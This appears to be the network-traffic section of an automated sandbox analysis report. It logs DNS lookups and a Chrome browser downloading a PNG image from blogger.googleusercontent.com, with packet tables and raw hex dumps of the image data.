                                  Jan 2, 2025 10:28:34.911395073 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.911416054 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.911442041 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.911467075 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:35.832268000 CET4434970323.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:35.833142996 CET49703443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:36.699915886 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:36.699944973 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:36.700001955 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:36.700273991 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:36.700285912 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.336690903 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.337172985 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:37.337182999 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.338288069 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.338376999 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:37.339673996 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:37.339740992 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.392849922 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:37.392863989 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:37.439757109 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:46.847604036 CET49703443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:46.847917080 CET49703443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:46.848393917 CET49729443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:46.848417997 CET4434972923.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:46.848490953 CET49729443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:46.848706961 CET49729443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:46.848721027 CET4434972923.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:46.852411032 CET4434970323.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:46.852693081 CET4434970323.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:47.265327930 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:47.265403032 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:28:47.265858889 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:47.568130970 CET4434972923.1.237.91192.168.2.5
                                  Jan 2, 2025 10:28:47.568213940 CET49729443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:48.520106077 CET49715443192.168.2.5142.250.186.164
                                  Jan 2, 2025 10:28:48.520133972 CET44349715142.250.186.164192.168.2.5
                                  Jan 2, 2025 10:29:06.721776962 CET4434972923.1.237.91192.168.2.5
                                  Jan 2, 2025 10:29:06.722115040 CET49729443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:29:18.486829042 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:29:18.486848116 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:29:34.519706011 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:29:34.519859076 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:29:34.519964933 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:29:36.761307001 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:36.761341095 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:36.761423111 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:36.761651039 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:36.761658907 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:37.438688040 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:37.439069986 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:37.439084053 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:37.439405918 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:37.439852953 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:37.439904928 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:37.486377954 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:47.320811987 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:47.320887089 CET44349998142.250.186.36192.168.2.5
                                  Jan 2, 2025 10:29:47.320951939 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:48.520032883 CET49998443192.168.2.5142.250.186.36
                                  Jan 2, 2025 10:29:48.520066977 CET44349998142.250.186.36192.168.2.5
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 2, 2025 10:28:32.153146982 CET53626871.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:32.221335888 CET53559801.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:32.342587948 CET6517153192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:32.342782021 CET5435853192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:32.349498987 CET53651711.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:32.350179911 CET53543581.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:33.238313913 CET53556491.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:33.686681032 CET5445153192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:33.686857939 CET6259853192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:33.693598986 CET53544511.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:33.694916964 CET53625981.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:36.691875935 CET5035553192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:36.692071915 CET6493253192.168.2.51.1.1.1
                                  Jan 2, 2025 10:28:36.698713064 CET53649321.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:36.698823929 CET53503551.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:36.808481932 CET53501871.1.1.1192.168.2.5
                                  Jan 2, 2025 10:28:50.245443106 CET53552631.1.1.1192.168.2.5
                                  Jan 2, 2025 10:29:09.190607071 CET53527271.1.1.1192.168.2.5
                                  Jan 2, 2025 10:29:31.965883970 CET53585961.1.1.1192.168.2.5
                                  Jan 2, 2025 10:29:31.995065928 CET53508891.1.1.1192.168.2.5
                                  Jan 2, 2025 10:29:36.753509045 CET5935353192.168.2.51.1.1.1
                                  Jan 2, 2025 10:29:36.753655910 CET5755953192.168.2.51.1.1.1
                                  Jan 2, 2025 10:29:36.760431051 CET53593531.1.1.1192.168.2.5
                                  Jan 2, 2025 10:29:36.760448933 CET53575591.1.1.1192.168.2.5
                                  Jan 2, 2025 10:30:02.250612974 CET53625331.1.1.1192.168.2.5
                                  Jan 2, 2025 10:30:47.963670015 CET53594581.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 2, 2025 10:28:32.342587948 CET192.168.2.51.1.1.10xe13eStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:28:32.342782021 CET192.168.2.51.1.1.10x5900Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                  Jan 2, 2025 10:28:33.686681032 CET192.168.2.51.1.1.10x3732Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:28:33.686857939 CET192.168.2.51.1.1.10xa5b5Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                  Jan 2, 2025 10:28:36.691875935 CET192.168.2.51.1.1.10x9b1eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:28:36.692071915 CET192.168.2.51.1.1.10x5819Standard query (0)www.google.com65IN (0x0001)false
                                  Jan 2, 2025 10:29:36.753509045 CET192.168.2.51.1.1.10xda7eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:29:36.753655910 CET192.168.2.51.1.1.10x2c21Standard query (0)www.google.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 2, 2025 10:28:32.349498987 CET1.1.1.1192.168.2.50xe13eNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 2, 2025 10:28:32.349498987 CET1.1.1.1192.168.2.50xe13eNo error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:28:32.350179911 CET1.1.1.1192.168.2.50x5900No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 2, 2025 10:28:33.693598986 CET1.1.1.1192.168.2.50x3732No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 2, 2025 10:28:33.693598986 CET1.1.1.1192.168.2.50x3732No error (0)googlehosted.l.googleusercontent.com142.250.186.65A (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:28:33.694916964 CET1.1.1.1192.168.2.50xa5b5No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 2, 2025 10:28:36.698713064 CET1.1.1.1192.168.2.50x5819No error (0)www.google.com65IN (0x0001)false
                                  Jan 2, 2025 10:28:36.698823929 CET1.1.1.1192.168.2.50x9b1eNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:29:36.760431051 CET1.1.1.1192.168.2.50xda7eNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                  Jan 2, 2025 10:29:36.760448933 CET1.1.1.1192.168.2.50x2c21No error (0)www.google.com65IN (0x0001)false
                                  • blogger.googleusercontent.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549707172.217.16.1934432568C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-02 09:28:33 UTC877OUTGET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1
                                  Host: blogger.googleusercontent.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-02 09:28:33 UTC465INHTTP/1.1 200 OK
                                  Content-Type: image/png
                                  Vary: Origin
                                  Access-Control-Expose-Headers: Content-Length
                                  ETag: "v16b"
                                  Expires: Fri, 03 Jan 2025 09:28:33 GMT
                                  Cache-Control: public, max-age=86400, no-transform
                                  Content-Disposition: inline;filename="image.png"
                                  X-Content-Type-Options: nosniff
                                  Date: Thu, 02 Jan 2025 09:28:33 GMT
                                  Server: fife
                                  Content-Length: 52776
                                  X-XSS-Protection: 0
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2025-01-02 09:28:33 UTC925INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 08 70 08 02 00 00 00 c0 ae cc 3e 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec dd 41 6c d6 f7 7d c7 f1 07 62 07 ec 4c cf e3 ec 89 c6 b3 0e fc 98 68 a3 5a 23 ec a7 5b aa 15 84 e1 69 a7 69 a9 64 84 a5 6d 6a 17 2c e1 9c 12 95 4a 45 3b b4 52 72 f1 25 3d e4 e4 4a a5 2a 87 a9 8e 44 b4 e6 e6 ca 48 e5 12 d5 04 b6 44 4b 0f c6 28 95 9a 43 b0 0d 9b 1c 69
                                  Data Ascii: PNGIHDRpp>sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATxAl}bLhZ#[iidmj,JE;Rr%=J*DHDK(Ci
                                  2025-01-02 09:28:33 UTC1390INData Raw: 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00
                                  Data Ascii: *A T@@P*A T@@P*A T@@P*A
                                  2025-01-02 09:28:33 UTC1390INData Raw: 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00
                                  Data Ascii: A T@@P*A T@@P*A T@@P*A T
                                  2025-01-02 09:28:33 UTC1390INData Raw: 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40
                                  Data Ascii: T@@P*A T@@P*A T@@P*A T@@
                                  2025-01-02 09:28:33 UTC1390INData Raw: e1 ba 9a 92 63 e5 53 67 34 15 00 00 e0 d1 09 2a 00 00 f0 29 8a 83 b5 13 3f f9 a9 9a 92 6f c5 e3 43 a7 df 99 2b 0e d6 52 0f 01 00 00 32 40 50 01 00 80 4f da bc e9 2b f5 0a f6 42 4f 7f f5 e4 f5 59 4d 05 00 00 08 09 2a 00 00 f0 ff 78 37 a5 d3 74 15 4b 9a 0a 00 00 10 12 54 00 00 e0 ff a8 29 9d 49 53 01 00 00 42 82 0a 00 00 fc 5a 77 a9 4f 4d e9 58 9a 0a 00 00 f0 70 82 0a 00 00 14 0a 85 42 77 a9 ef 84 9a d2 d9 34 15 00 00 e0 21 04 15 00 00 28 14 0a 85 67 df 9c 2e 1e 1f 4a bd 82 c4 34 15 00 00 e0 f7 11 54 00 00 a0 50 bb 32 55 3e 75 26 f5 0a da 82 a6 02 00 00 7c 2a 41 05 00 80 4e 77 64 6c fc f0 f9 0b a9 57 d0 46 36 9b 4a 6f 75 20 f5 10 00 00 a0 8d 08 2a 00 00 74 b4 e2 60 6d e8 07 3f 4c bd 82 b6 d3 55 2c 3d fb a3 e9 ee 52 5f ea 21 00 00 40 bb 10 54 00 00 e8 5c dd
                                  Data Ascii: cSg4*)?oC+R2@PO+BOYM*x7tKT)ISBZwOMXpBw4!(g.J4TP2U>u&|*ANwdlWF6Jou *t`m?LU,=R_!@T\
                                  2025-01-02 09:28:33 UTC1390INData Raw: f5 00 00 00 68 8d 43 23 a3 a9 27 ec 91 bb df ff ee 3b cf d5 53 9d 7b f8 e0 3b 13 b7 5f 7a 21 c9 47 67 d1 d3 df b8 d4 5d ea 4b bd 02 00 00 68 01 41 05 00 80 3c e8 ad 0e 54 46 ce a5 5e b1 17 6e bf f4 c2 fb df ba 94 76 c3 bd ab 53 6f 9f fc fc 46 b3 91 76 46 26 74 15 4b 47 2f 26 fe f3 02 00 00 5a 42 50 01 00 20 0f 3a e1 78 ca 46 b3 71 fb a5 17 ee 5d 9d 4a 3d a4 50 28 14 9a f3 73 ff f6 5c 5d 53 79 14 0e a9 00 00 40 3e 08 2a 00 00 e4 c1 91 b1 f1 d4 13 76 dd 7b 5f 1d 6d 93 9a b2 a9 39 3f f7 de 57 f3 df b1 76 ce 21 15 00 00 c8 07 41 05 00 80 cc eb ad 0e 14 8f 0f a5 5e b1 bb 6e bf f4 42 1b be 6d be 72 73 d6 7b 2a 8f c2 21 15 00 00 c8 81 c7 9e 7f 3c f5 04 00 00 d8 99 a3 17 2f 95 87 eb a9 57 ec a2 f6 b9 e9 eb 77 35 e7 e7 ba fb 9e 7c f2 0b 5f 4c 3d a4 ad ed 3f 70 f0
                                  Data Ascii: hC#';S{;_z!Gg]KhA<TF^nvSoFvF&tKG/&ZBP :xFq]J=P(s\]Sy@>*v{_m9?Wv!A^nBmrs{*!</Ww5|_L=?p
                                  2025-01-02 09:28:33 UTC1390INData Raw: 00 6d 4c 50 01 00 20 33 ca a7 ce a4 9e d0 32 1d f5 80 ca 26 ef d2 87 7a fa ab bd f9 aa 86 00 00 90 27 82 0a 00 00 d9 90 b3 7f 68 ee a8 e3 29 9b d6 3a 2c 20 6d cf 21 87 54 00 00 a0 5d 09 2a 00 00 64 43 4f ff 40 ea 09 ad d4 81 c7 35 3a ed 44 ce f6 78 46 05 00 00 da 96 a0 02 00 40 36 e4 ec 1f 9a 3b f0 84 4a f3 4e c7 35 a4 6d a8 8c 9c 4b 3d 01 00 00 f8 74 82 0a 00 00 d9 d0 dd d7 97 7a 42 2b 35 3b ef 84 ca fa ea 6a ea 09 d9 90 b3 76 08 00 00 b9 21 a8 00 00 90 0d c5 c1 5a ea 09 2d b3 72 eb 46 ea 09 09 74 e0 a1 9c ed a9 9c f5 8c 0a 00 00 b4 23 41 05 00 80 6c 28 e5 28 a8 74 e0 f1 14 1e 9d 13 2a 00 00 d0 9e 04 15 00 00 b2 a1 ab 58 4a 3d a1 65 3a 36 a8 34 ef dc 4e 3d 21 03 8a c7 87 ba 4b b9 ba e0 0e 00 00 f2 41 50 01 00 20 03 72 f6 7f f6 1f 2c 2e a4 9e 90 c6 7a c3
                                  Data Ascii: mLP 32&z'h):, m!T]*dCO@5:DxF@6;JN5mK=tzB+5;jv!Z-rFt#Al((t*XJ=e:64N=!KAP r,.z
                                  2025-01-02 09:28:33 UTC1390INData Raw: b3 8e d0 00 00 40 18 85 0a 00 00 40 1a 8a 2b 2b d1 11 00 00 a0 b9 14 2a 00 00 00 00 00 00 a7 50 a8 00 00 00 55 b0 f2 0b 00 00 48 9a 42 05 00 00 20 0d 1d 2b bf 00 00 20 8e 42 05 00 00 aa e0 fa 85 83 ea 17 37 55 74 a2 23 00 00 40 73 29 54 00 00 a0 0a ed 4e d3 eb 04 95 12 00 00 90 34 85 0a 00 00 00 00 00 c0 29 14 2a 00 00 40 15 dc ff 28 c5 4c b7 17 1d 01 00 00 1a 4a a1 02 00 00 54 c1 fd 8f 52 4c 2f f6 a2 23 00 00 40 43 29 54 00 00 a8 af a3 bd dd e8 08 94 c3 09 19 00 00 20 75 0a 15 00 00 ea eb b0 bf 1b 1d 81 72 b8 48 0f 00 00 a4 4e a1 02 00 00 00 00 00 70 0a 85 0a 00 00 54 a1 3d db e8 9d 57 73 57 af 45 47 00 00 00 b8 10 85 0a 00 00 54 a1 58 b2 f3 8a 12 a8 a6 00 00 20 8a 42 05 00 00 98 b8 99 6e 2f 3a 02 00 00 c0 85 28 54 00 00 80 89 9b 56 a8 00 00 00 89 53 a8
                                  Data Ascii: @@++*PUHB + B7Ut#@s)TN4)*@(LJTRL/#@C)T urHNpT=WsWEGTX Bn/:(TVS
                                  2025-01-02 09:28:33 UTC1390INData Raw: a3 9d 67 d1 11 ca 31 b7 ba 16 1d 61 22 e6 3e b8 16 1d 01 00 00 60 22 14 2a 00 00 a4 e4 78 78 10 1d a1 34 59 6e c7 9a c9 f4 36 4c 1d 64 d3 26 02 00 40 a2 14 2a 00 00 a4 64 f0 78 33 3a 42 69 f2 bb 4b df ee cc 4e 2f 76 a3 53 64 2b a7 36 11 00 00 52 a4 50 01 00 20 25 39 dd a5 9f bb 7a 2d 3a 42 c9 8a 2b 0e a8 00 00 00 d9 52 a8 00 00 90 12 77 e9 eb 2c bf 8a a8 56 8e 32 fa f0 03 00 40 8a 14 2a 00 00 a4 64 b4 bd 15 1d a1 34 f9 cd 73 64 79 15 a6 3e 72 6a 13 01 00 20 45 0a 15 00 00 52 92 d3 19 89 4e 76 85 4a 7e 15 11 00 00 c0 af 28 54 00 00 48 cc e0 e9 a3 e8 08 e5 98 2a 3a ed 4e 56 5b bf 8a a5 e5 e8 08 39 1b ed e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 34 d2 e1 80 ca a4 1d 1f e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 54 42 38 a0 02 00 00 e4 4d a1
                                  Data Ascii: g1a">`"*xx4Yn6Ld&@*dx3:BiKN/vSd+6RP %9z-:B+Rw,V2@*d4sdy>rj ERNvJ~(TH*:NV[93)R.I43)R.ITB8M
                                  2025-01-02 09:28:33 UTC1390INData Raw: 9c 86 54 a6 17 bb 33 dd 5e 74 8a 97 14 57 56 a6 8a 4e 74 8a a6 18 3c de 8c 8e 00 00 00 bc 44 a1 02 00 40 3e 72 2a 54 5a f5 1b 52 a9 5b 9e bc b9 48 0f 00 00 75 a3 50 01 00 20 1f a3 ed ad e8 08 65 aa 5b 81 51 b7 3c 79 73 91 1e 00 00 ea 46 a1 02 00 40 3e 0e fb bb 47 7b fd e8 14 a5 a9 5b 81 e1 80 4a 95 32 6b 07 01 00 20 03 0a 15 00 00 b2 92 d3 d6 af 5a 9d 51 99 e9 f6 a6 17 bb d1 29 9a e2 64 34 74 94 1e 00 00 ea 46 a1 02 00 40 56 86 79 7d af bf 3e 43 2a f5 49 d2 04 99 7d 8c 01 00 20 0f 0a 15 00 00 b2 92 d3 84 4a ab d5 7a e7 fa 8d e8 08 2f 28 54 aa 64 df 17 00 00 d4 90 42 05 00 80 ac 8c b6 b7 4e 46 c3 e8 14 a5 79 fb 83 6b d1 11 5e 28 1c 50 a9 d0 f1 81 7d 5f 00 00 50 3b 0a 15 00 00 72 f3 f5 e3 cd e8 08 a5 99 2a 3a 75 68 32 da 9d d9 62 69 39 3a 45 83 64 36 68 05
                                  Data Ascii: T3^tWVNt<D@>r*TZR[HuP e[Q<ysF@>G{[J2k ZQ)d4tF@Vy}>C*I} Jz/(TdBNFyk^(P}_P;r*:uh2bi9:Ed6h


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549713142.250.186.654432568C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-02 09:28:34 UTC677OUTGET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1
                                  Host: blogger.googleusercontent.com
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-02 09:28:34 UTC465INHTTP/1.1 200 OK
                                  Content-Type: image/png
                                  Vary: Origin
                                  Access-Control-Expose-Headers: Content-Length
                                  ETag: "v16b"
                                  Expires: Fri, 03 Jan 2025 09:28:34 GMT
                                  Cache-Control: public, max-age=86400, no-transform
                                  Content-Disposition: inline;filename="image.png"
                                  X-Content-Type-Options: nosniff
                                  Date: Thu, 02 Jan 2025 09:28:34 GMT
                                  Server: fife
                                  Content-Length: 52776
                                  X-XSS-Protection: 0
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2025-01-02 09:28:34 UTC925INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 08 70 08 02 00 00 00 c0 ae cc 3e 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec dd 41 6c d6 f7 7d c7 f1 07 62 07 ec 4c cf e3 ec 89 c6 b3 0e fc 98 68 a3 5a 23 ec a7 5b aa 15 84 e1 69 a7 69 a9 64 84 a5 6d 6a 17 2c e1 9c 12 95 4a 45 3b b4 52 72 f1 25 3d e4 e4 4a a5 2a 87 a9 8e 44 b4 e6 e6 ca 48 e5 12 d5 04 b6 44 4b 0f c6 28 95 9a 43 b0 0d 9b 1c 69
                                  Data Ascii: PNGIHDRpp>sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATxAl}bLhZ#[iidmj,JE;Rr%=J*DHDK(Ci
